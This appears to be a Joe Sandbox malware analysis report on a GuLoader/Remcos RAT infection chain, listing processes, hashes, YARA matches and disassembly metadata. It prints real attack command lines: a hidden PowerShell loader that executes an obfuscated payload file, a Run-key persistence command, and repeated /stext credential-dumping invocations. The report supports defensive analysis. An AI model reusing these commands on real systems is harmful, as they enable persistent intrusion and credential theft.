                                                                            File size:990'768 bytes
                                                                            MD5 hash:450228D72F9F726B645C55BBBC6DB905
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:24
                                                                            Start time:03:53:58
                                                                            Start date:30/09/2024
                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"powershell.exe" -windowstyle hidden "$krjning=Get-Content -Raw 'C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Aerognosy.Res';$Lukewarmly95=$krjning.SubString(5322,3);.$Lukewarmly95($krjning)"
                                                                            Imagebase:0xfe0000
                                                                            File size:427'008 bytes
                                                                            MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000018.00000002.1008062874.0000000009B56000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:28
                                                                            Start time:03:55:49
                                                                            Start date:30/09/2024
                                                                            Path:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\Vaccinerende.exe"
                                                                            Imagebase:0x400000
                                                                            File size:990'768 bytes
                                                                            MD5 hash:450228D72F9F726B645C55BBBC6DB905
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:false

                                                                            General

                                                                            Target ID:29
                                                                            Start time:03:56:12
                                                                            Start date:30/09/2024
                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Chivey57" /t REG_EXPAND_SZ /d "%Misbehavers% -windowstyle 1 $Frligheden=(gp -Path 'HKCU:\Software\Roscoelite\').Aftvttedes;%Misbehavers% ($Frligheden)"
                                                                            Imagebase:0x4a770000
                                                                            File size:302'592 bytes
                                                                            MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:31
                                                                            Start time:03:56:13
                                                                            Start date:30/09/2024
                                                                            Path:C:\Windows\SysWOW64\reg.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Chivey57" /t REG_EXPAND_SZ /d "%Misbehavers% -windowstyle 1 $Frligheden=(gp -Path 'HKCU:\Software\Roscoelite\').Aftvttedes;%Misbehavers% ($Frligheden)"
                                                                            Imagebase:0xc50000
                                                                            File size:62'464 bytes
                                                                            MD5 hash:D69A9ABBB0D795F21995C2F48C1EB560
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:33
                                                                            Start time:03:56:18
                                                                            Start date:30/09/2024
                                                                            Path:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\Vaccinerende.exe"
                                                                            Imagebase:0x400000
                                                                            File size:990'768 bytes
                                                                            MD5 hash:450228D72F9F726B645C55BBBC6DB905
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000021.00000002.1004764696.0000000006AA4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:34
                                                                            Start time:03:56:20
                                                                            Start date:30/09/2024
                                                                            Path:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\uufpqcznfpbrpkbrchvwvbbgmplrtlta"
                                                                            Imagebase:0x400000
                                                                            File size:990'768 bytes
                                                                            MD5 hash:450228D72F9F726B645C55BBBC6DB905
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:35
                                                                            Start time:03:56:20
                                                                            Start date:30/09/2024
                                                                            Path:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\wwta"
                                                                            Imagebase:0x400000
                                                                            File size:990'768 bytes
                                                                            MD5 hash:450228D72F9F726B645C55BBBC6DB905
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:36
                                                                            Start time:03:56:21
                                                                            Start date:30/09/2024
                                                                            Path:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\hrysrnv"
                                                                            Imagebase:0x400000
                                                                            File size:990'768 bytes
                                                                            MD5 hash:450228D72F9F726B645C55BBBC6DB905
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:37
                                                                            Start time:03:56:26
                                                                            Start date:30/09/2024
                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -windowstyle 1 $Frligheden=(gp -Path 'HKCU:\Software\Roscoelite\').Aftvttedes;c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe ($Frligheden)
                                                                            Imagebase:0xfe0000
                                                                            File size:427'008 bytes
                                                                            MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:39
                                                                            Start time:03:56:30
                                                                            Start date:30/09/2024
                                                                            Path:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\jypyihgkg"
                                                                            Imagebase:0x400000
                                                                            File size:990'768 bytes
                                                                            MD5 hash:450228D72F9F726B645C55BBBC6DB905
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:40
                                                                            Start time:03:56:32
                                                                            Start date:30/09/2024
                                                                            Path:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\tsdrjareurci"
                                                                            Imagebase:0x400000
                                                                            File size:990'768 bytes
                                                                            MD5 hash:450228D72F9F726B645C55BBBC6DB905
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:41
                                                                            Start time:03:56:32
                                                                            Start date:30/09/2024
                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "$krjning=Get-Content -Raw 'C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Aerognosy.Res';$Lukewarmly95=$krjning.SubString(5322,3);.$Lukewarmly95($krjning)"
                                                                            Imagebase:0xfe0000
                                                                            File size:427'008 bytes
                                                                            MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:false

                                                                            General

                                                                            Target ID:42
                                                                            Start time:03:56:32
                                                                            Start date:30/09/2024
                                                                            Path:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\wvibksbfizuvagm"
                                                                            Imagebase:0x400000
                                                                            File size:990'768 bytes
                                                                            MD5 hash:450228D72F9F726B645C55BBBC6DB905
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:43
                                                                            Start time:03:56:36
                                                                            Start date:30/09/2024
                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -windowstyle 1 $Frligheden=(gp -Path 'HKCU:\Software\Roscoelite\').Aftvttedes;c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe ($Frligheden)
                                                                            Imagebase:0xfe0000
                                                                            File size:427'008 bytes
                                                                            MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:46
                                                                            Start time:03:56:40
                                                                            Start date:30/09/2024
                                                                            Path:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\iwmakfxbvkkvnuhajheo"
                                                                            Imagebase:0x400000
                                                                            File size:990'768 bytes
                                                                            MD5 hash:450228D72F9F726B645C55BBBC6DB905
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:47
                                                                            Start time:03:56:40
                                                                            Start date:30/09/2024
                                                                            Path:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\krsslxicrscipavesrrqbfdw"
                                                                            Imagebase:0x400000
                                                                            File size:990'768 bytes
                                                                            MD5 hash:450228D72F9F726B645C55BBBC6DB905
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:48
                                                                            Start time:03:56:40
                                                                            Start date:30/09/2024
                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "$krjning=Get-Content -Raw 'C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Aerognosy.Res';$Lukewarmly95=$krjning.SubString(5322,3);.$Lukewarmly95($krjning)"
                                                                            Imagebase:0xfe0000
                                                                            File size:427'008 bytes
                                                                            MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:false

                                                                            General

                                                                            Target ID:49
                                                                            Start time:03:56:40
                                                                            Start date:30/09/2024
                                                                            Path:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\vtxdlqtwfaunaojibclrekqfvdn"
                                                                            Imagebase:0x400000
                                                                            File size:990'768 bytes
                                                                            MD5 hash:450228D72F9F726B645C55BBBC6DB905
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:50
                                                                            Start time:03:56:47
                                                                            Start date:30/09/2024
                                                                            Path:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\myrqksteqvbcbpuimnlztpdvy"
                                                                            Imagebase:0x400000
                                                                            File size:990'768 bytes
                                                                            MD5 hash:450228D72F9F726B645C55BBBC6DB905
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:false

                                                                            General

                                                                            Target ID:51
                                                                            Start time:03:56:52
                                                                            Start date:30/09/2024
                                                                            Path:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\xtwidkeyedthlwimexyaecymzxube"
                                                                            Imagebase:0x400000
                                                                            File size:990'768 bytes
                                                                            MD5 hash:450228D72F9F726B645C55BBBC6DB905
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:52
                                                                            Start time:03:56:53
                                                                            Start date:30/09/2024
                                                                            Path:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\zvbbddpzsllmnceqnitchhsvidlcgnnv"
                                                                            Imagebase:0x400000
                                                                            File size:990'768 bytes
                                                                            MD5 hash:450228D72F9F726B645C55BBBC6DB905
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:54
                                                                            Start time:03:57:04
                                                                            Start date:30/09/2024
                                                                            Path:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\jghbahqihjysxfkijlbzkstdovyth"
                                                                            Imagebase:0x400000
                                                                            File size:990'768 bytes
                                                                            MD5 hash:450228D72F9F726B645C55BBBC6DB905
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:false

                                                                            General

                                                                            Target ID:55
                                                                            Start time:03:57:07
                                                                            Start date:30/09/2024
                                                                            Path:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\tamubzacvrqfilguawnanwnuwchuixxt"
                                                                            Imagebase:0x400000
                                                                            File size:990'768 bytes
                                                                            MD5 hash:450228D72F9F726B645C55BBBC6DB905
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:56
                                                                            Start time:03:57:08
                                                                            Start date:30/09/2024
                                                                            Path:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\dcam"
                                                                            Imagebase:0x13fa80000
                                                                            File size:990'768 bytes
                                                                            MD5 hash:450228D72F9F726B645C55BBBC6DB905
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:57
                                                                            Start time:03:57:14
                                                                            Start date:30/09/2024
                                                                            Path:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
                                                                            Wow64 process (32bit):
                                                                            Commandline:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\ctsuyeuksgddrommozvfphobcmulr"
                                                                            Imagebase:
                                                                            File size:990'768 bytes
                                                                            MD5 hash:450228D72F9F726B645C55BBBC6DB905
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:false

                                                                            Disassembly

                                                                            Code Analysis

                                                                            Call Graph

                                                                            • Entrypoint
                                                                            • Decryption Function
                                                                            • Executed
                                                                            • Not Executed
                                                                            • Show Help
                                                                            callgraph 1 Error: Graph is empty

                                                                            Module: Sheet1

                                                                            Declaration
                                                                            LineContent
                                                                            1

                                                                            Attribute VB_Name = "Sheet1"

                                                                            2

                                                                            Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                                            3

                                                                            Attribute VB_GlobalNameSpace = False

                                                                            4

                                                                            Attribute VB_Creatable = False

                                                                            5

                                                                            Attribute VB_PredeclaredId = True

                                                                            6

                                                                            Attribute VB_Exposed = True

                                                                            7

                                                                            Attribute VB_TemplateDerived = False

                                                                            8

                                                                            Attribute VB_Customizable = True

                                                                            Module: Sheet2

                                                                            Declaration
                                                                            LineContent
                                                                            1

                                                                            Attribute VB_Name = "Sheet2"

                                                                            2

                                                                            Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                                            3

                                                                            Attribute VB_GlobalNameSpace = False

                                                                            4

                                                                            Attribute VB_Creatable = False

                                                                            5

                                                                            Attribute VB_PredeclaredId = True

                                                                            6

                                                                            Attribute VB_Exposed = True

                                                                            7

                                                                            Attribute VB_TemplateDerived = False

                                                                            8

                                                                            Attribute VB_Customizable = True

                                                                            Module: Sheet3

                                                                            Declaration
                                                                            LineContent
                                                                            1

                                                                            Attribute VB_Name = "Sheet3"

                                                                            2

                                                                            Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                                            3

                                                                            Attribute VB_GlobalNameSpace = False

                                                                            4

                                                                            Attribute VB_Creatable = False

                                                                            5

                                                                            Attribute VB_PredeclaredId = True

                                                                            6

                                                                            Attribute VB_Exposed = True

                                                                            7

                                                                            Attribute VB_TemplateDerived = False

                                                                            8

                                                                            Attribute VB_Customizable = True

                                                                            Module: ThisWorkbook

                                                                            Declaration
                                                                            LineContent
                                                                            1

                                                                            Attribute VB_Name = "ThisWorkbook"

                                                                            2

                                                                            Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

                                                                            3

                                                                            Attribute VB_GlobalNameSpace = False

                                                                            4

                                                                            Attribute VB_Creatable = False

                                                                            5

                                                                            Attribute VB_PredeclaredId = True

                                                                            6

                                                                            Attribute VB_Exposed = True

                                                                            7

                                                                            Attribute VB_TemplateDerived = False

                                                                            8

                                                                            Attribute VB_Customizable = True

                                                                            Reset < >

                                                                              Executed Functions

                                                                              Function 030B0FB9 Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000003.413689592.00000000030B0000.00000010.00000800.00020000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_3_30b0000_mshta.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                                              • Instruction ID: 5529fca36150f31da0b986077cb1f13732b68b0e978173cbfe1c7568bdb5f22f
                                                                              • Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                                              • Instruction Fuzzy Hash:
                                                                              Function 030B0FB1 Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000003.413689592.00000000030B0000.00000010.00000800.00020000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_3_30b0000_mshta.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                                              • Instruction ID: 5529fca36150f31da0b986077cb1f13732b68b0e978173cbfe1c7568bdb5f22f
                                                                              • Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                                              • Instruction Fuzzy Hash:
                                                                              Function 030B0FC1 Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000003.413689592.00000000030B0000.00000010.00000800.00020000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_3_30b0000_mshta.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                                              • Instruction ID: 5529fca36150f31da0b986077cb1f13732b68b0e978173cbfe1c7568bdb5f22f
                                                                              • Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                                              • Instruction Fuzzy Hash:

                                                                              Execution Graph

                                                                              Execution Coverage:3.6%
                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                              Signature Coverage:0%
                                                                              Total number of Nodes:4
                                                                              Total number of Limit Nodes:0
                                                                              execution_graph 4548 7fe896f7c25 4549 7fe896f7c33 4548->4549 4550 7fe896f7bed URLDownloadToFileW 4549->4550 4551 7fe896f7bf3 4549->4551 4550->4551

                                                                              Executed Functions

                                                                              Function 000007FE896F7018 Relevance: 1.6, APIs: 1, Instructions: 129filenetworkCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 234 7fe896f7018-7fe896f7ba1 238 7fe896f7ba3-7fe896f7ba8 234->238 239 7fe896f7bab-7fe896f7bb1 234->239 238->239 240 7fe896f7bb3-7fe896f7bb8 239->240 241 7fe896f7bbb-7fe896f7bfe URLDownloadToFileW 239->241 240->241 243 7fe896f7c00 241->243 244 7fe896f7c06-7fe896f7c23 241->244 243->244
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.453910656.000007FE896F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE896F0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_7fe896f0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID: DownloadFile
                                                                              • String ID:
                                                                              • API String ID: 1407266417-0
                                                                              • Opcode ID: 48d40e94c7beed09557972d92943cf1cb116cdcc49ddab45cb2d964aa0bbef93
                                                                              • Instruction ID: 7b20aa320ccb1c906ac2f4089d4699639d1b64140bb39c570b3484cefffac868
                                                                              • Opcode Fuzzy Hash: 48d40e94c7beed09557972d92943cf1cb116cdcc49ddab45cb2d964aa0bbef93
                                                                              • Instruction Fuzzy Hash: E8319E3190CA1C8FDB58EF5C9885BA9B7E1FB69321F00826ED04DD3651CB70B8468B81
                                                                              Function 000007FE897C4165 Relevance: 6.7, Strings: 5, Instructions: 434COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.454040006.000007FE897C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE897C0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_7fe897c0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: (F\$0cd$0cd$0cd$8F\
                                                                              • API String ID: 0-2897985527
                                                                              • Opcode ID: e04829d0af8dc8c4c24263e2ba2bca7e4c8cd20f160e23febc20bba6e78be20b
                                                                              • Instruction ID: 56e11d1671f8ad65b4ef55c23754403c3bb4822cc36da71486e5d56e67bcc6b0
                                                                              • Opcode Fuzzy Hash: e04829d0af8dc8c4c24263e2ba2bca7e4c8cd20f160e23febc20bba6e78be20b
                                                                              • Instruction Fuzzy Hash: E4C13930A1DAC94FE74AE72C54146BA7FE1EF86398F1501EBD48EC71A3D618AC52C361
                                                                              Function 000007FE897C8549 Relevance: 3.2, Strings: 2, Instructions: 707COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 56 7fe897c8549-7fe897c85f9 58 7fe897c8add-7fe897c8b96 56->58 59 7fe897c85ff-7fe897c8609 56->59 60 7fe897c860b-7fe897c8618 59->60 61 7fe897c8622-7fe897c8629 59->61 60->61 62 7fe897c861a-7fe897c8620 60->62 63 7fe897c862b-7fe897c863e 61->63 64 7fe897c8640 61->64 62->61 66 7fe897c8642-7fe897c8644 63->66 64->66 69 7fe897c864a-7fe897c8656 66->69 70 7fe897c8a58-7fe897c8a62 66->70 69->58 73 7fe897c865c-7fe897c8666 69->73 71 7fe897c8a75-7fe897c8a85 70->71 72 7fe897c8a64-7fe897c8a74 70->72 75 7fe897c8a87-7fe897c8a8b 71->75 76 7fe897c8a92-7fe897c8adc 71->76 77 7fe897c8668-7fe897c8675 73->77 78 7fe897c8682-7fe897c8692 73->78 75->76 77->78 79 7fe897c8677-7fe897c8680 77->79 78->70 83 7fe897c8698-7fe897c86cc 78->83 79->78 83->70 89 7fe897c86d2-7fe897c86de 83->89 89->58 90 7fe897c86e4-7fe897c86ee 89->90 91 7fe897c8707-7fe897c870c 90->91 92 7fe897c86f0-7fe897c86fd 90->92 91->70 94 7fe897c8712-7fe897c8717 91->94 92->91 93 7fe897c86ff-7fe897c8705 92->93 93->91 94->70 95 7fe897c871d-7fe897c8722 94->95 95->70 96 7fe897c8728-7fe897c8737 95->96 98 7fe897c8747 96->98 99 7fe897c8739-7fe897c8743 96->99 102 7fe897c874c-7fe897c8759 98->102 100 7fe897c8763-7fe897c87ee 99->100 101 7fe897c8745 99->101 109 7fe897c8802-7fe897c8824 100->109 110 7fe897c87f0-7fe897c87fb 100->110 101->102 102->100 103 7fe897c875b-7fe897c8761 102->103 103->100 111 7fe897c8826-7fe897c8830 109->111 112 7fe897c8834 109->112 110->109 113 7fe897c8832 111->113 114 7fe897c8850-7fe897c88de 111->114 115 7fe897c8839-7fe897c8846 112->115 113->115 122 7fe897c88f2-7fe897c8910 114->122 123 7fe897c88e0-7fe897c88eb 114->123 115->114 116 7fe897c8848-7fe897c884e 115->116 116->114 124 7fe897c8912-7fe897c891c 122->124 125 7fe897c8920 122->125 123->122 126 7fe897c893d-7fe897c89cd 124->126 127 7fe897c891e 124->127 128 7fe897c8925-7fe897c8933 125->128 135 7fe897c89cf-7fe897c89da 126->135 136 7fe897c89e1-7fe897c8a3a 126->136 127->128 128->126 130 7fe897c8935-7fe897c893b 128->130 130->126 135->136 139 7fe897c8a42-7fe897c8a57 136->139
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.454040006.000007FE897C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE897C0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_7fe897c0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 0cd$8=d
                                                                              • API String ID: 0-3776316638
                                                                              • Opcode ID: 6fc4862bee268de6095de086620ebc195cb975cdcb2128572b44b9b4b741ed3e
                                                                              • Instruction ID: 32ff5254bdca9b7df7e63cb2ac4492011fdba2ad2509ed9e6f6811701c785f26
                                                                              • Opcode Fuzzy Hash: 6fc4862bee268de6095de086620ebc195cb975cdcb2128572b44b9b4b741ed3e
                                                                              • Instruction Fuzzy Hash: 5522163090DB894FE74ADB2C84517B97BE2FF9A344F2401AED44EC72A3DA25AC56C741
                                                                              Function 000007FE897C566D Relevance: 3.0, Strings: 2, Instructions: 463COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
